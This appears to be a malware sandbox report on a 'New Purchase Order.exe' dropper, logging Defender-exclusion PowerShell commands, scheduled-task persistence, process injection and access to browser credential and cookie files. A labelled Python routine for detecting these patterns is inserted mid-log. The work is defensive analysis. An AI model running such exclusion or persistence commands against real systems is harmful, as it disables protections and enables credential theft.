            Source: C:\Windows\SysWOW64\setupugc.exe | Thread register set: target process: 1584
            Source: C:\Windows\SysWOW64\setupugc.exe | Thread APC queued: target process: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hbaiQWstL.exe"
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp"
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpD3A8.tmp"
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | Process created: C:\Users\user\AppData\Roaming\hbaiQWstL.exe "C:\Users\user\AppData\Roaming\hbaiQWstL.exe"
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | Process created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"
            Source: C:\Windows\SysWOW64\setupugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
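The process-creation entries above carry the two behaviours the Sigma hits in this report key on: the dropper spawns powershell.exe to add a Defender exclusion for itself and for its persistence copy, and it registers a scheduled task from an XML file written to the user's Temp folder. The triage routine below is an added example, not code from the Joe Sandbox report or from any vendor product; it assumes process records with parent_image, image and cmdline fields (the shape a Sysmon Event ID 1 or EDR feed provides), and it also handles the -EncodedCommand form (base64 of UTF-16LE) that the "Powershell Base64 Encoded MpPreference Cmdlet" rule refers to. The first three command lines in EVENTS are copied from this report; the encoded record and the benign record are constructed for the example.

```python
"""Process-creation triage for Defender-exclusion and schtasks-from-Temp patterns.

Added example, not code from the Joe Sandbox report or any vendor product.
Event records are assumed to carry parent_image, image and cmdline.
"""
import base64
import re

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')
_ENC_FLAG = re.compile(r"^-(e|ec|enc|encodedcommand)$", re.I)   # powershell.exe accepts prefixes
_EXCLUSION = re.compile(
    r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)\s+"
    r"(?P<val>\"[^\"]*\"|'[^']*'|\S+)", re.I | re.S)
_USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp)\\", re.I)


def split_cmdline(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted arguments whole."""
    return [q if q else t for q, t in _TOKEN.findall(cmdline)]


def _requote(tokens):
    return " ".join('"%s"' % t if " " in t else t for t in tokens)


def _arg_after(tokens, flag):
    low = [t.lower() for t in tokens]
    if flag in low and low.index(flag) + 1 < len(tokens):
        return tokens[low.index(flag) + 1]
    return None


def effective_command(tokens):
    """Text PowerShell will actually run: decodes -EncodedCommand, else re-joins the args."""
    for i, tok in enumerate(tokens[:-1]):
        if _ENC_FLAG.match(tok):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return tokens[i + 1]        # undecodable: hand the raw payload to the rules
    return _requote(tokens[1:])


def triage(event):
    """Return a list of findings for one process-creation record."""
    image = event["image"].lower()
    tokens = split_cmdline(event["cmdline"])
    findings = []
    if image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        text = effective_command(tokens)
        for m in _EXCLUSION.finditer(text):
            target = m.group("val").strip("\"'")           # first value of a list only
            f = {"rule": "defender_exclusion", "kind": m.group(1).lower(), "target": target,
                 "severity": "medium", "encoded": any(_ENC_FLAG.match(t) for t in tokens)}
            if target.lower() == event["parent_image"].lower():
                f["rule"], f["severity"] = "defender_self_exclusion", "high"
            elif _USER_WRITABLE.search(target):             # exclusion covers a user-writable path
                f["severity"] = "high"
            findings.append(f)
    if image.endswith("\\schtasks.exe"):
        low = [t.lower() for t in tokens]
        xml = _arg_after(tokens, "/xml")
        if "/create" in low and xml and re.search(r"\\temp\\", xml, re.I):
            findings.append({"rule": "schtask_xml_from_temp", "target": xml,
                             "task": _arg_after(tokens, "/tn"), "severity": "high"})
    return findings


def triage_all(events):
    return [f for e in events for f in triage(e)]


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
DROPPER = r"C:\Users\user\Desktop\New Purchase Order.exe"
ENCODED_CMDLET = base64.b64encode(      # constructed: the same cmdlet behind -EncodedCommand
    'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming\\hbaiQWstL.exe"'
    .encode("utf-16-le")).decode()

EVENTS = [   # constructed records; the first three command lines are the ones in the report
    {"parent_image": DROPPER, "image": PS,
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"'},
    {"parent_image": DROPPER, "image": PS,
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hbaiQWstL.exe"'},
    {"parent_image": DROPPER, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp"'},
    {"parent_image": DROPPER, "image": PS,                      # constructed: encoded variant
     "cmdline": '"%s" -NoProfile -EncodedCommand %s' % (PS, ENCODED_CMDLET)},
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS,   # constructed: admin, system path
     "cmdline": '"%s" Add-MpPreference -ExclusionPath "C:\\Program Files\\Backup Agent"' % PS},
]

if __name__ == "__main__":
    for f in triage_all(EVENTS):
        print("%-26s %-6s %s" % (f["rule"], f["severity"], f["target"]))
```

The self-exclusion case (the excluded path equals the parent image) is the strongest signal in this report and is independent of where the file sits; the user-writable-path check carries the rest. The rule still reports an exclusion for a system directory at medium severity because an administrator can legitimately add one, which is exactly why the verdict should come from the parent process rather than from the cmdlet alone.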
            Source: SguBfrlSDIFxPr.exe, 00000010.00000002.3378000689.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000000.2306003043.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000002.3378199890.0000000000F50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
            Source: SguBfrlSDIFxPr.exe, 00000010.00000002.3378000689.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000000.2306003043.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000002.3378199890.0000000000F50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: SguBfrlSDIFxPr.exe, 00000010.00000002.3378000689.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000000.2306003043.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000002.3378199890.0000000000F50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: SguBfrlSDIFxPr.exe, 00000010.00000002.3378000689.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000000.2306003043.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000002.3378199890.0000000000F50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Users\user\Desktop\New Purchase Order.exe VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeQueries volume information: C:\Users\user\AppData\Roaming\hbaiQWstL.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

Source: Yara match | File source: 9.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3378481674.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2391347243.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3376676008.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.3381064714.0000000004D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3379021381.0000000002F50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2393013278.00000000024F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\setupugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

Source: Yara match | File source: 9.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3378481674.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2391347243.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3376676008.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.3381064714.0000000004D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
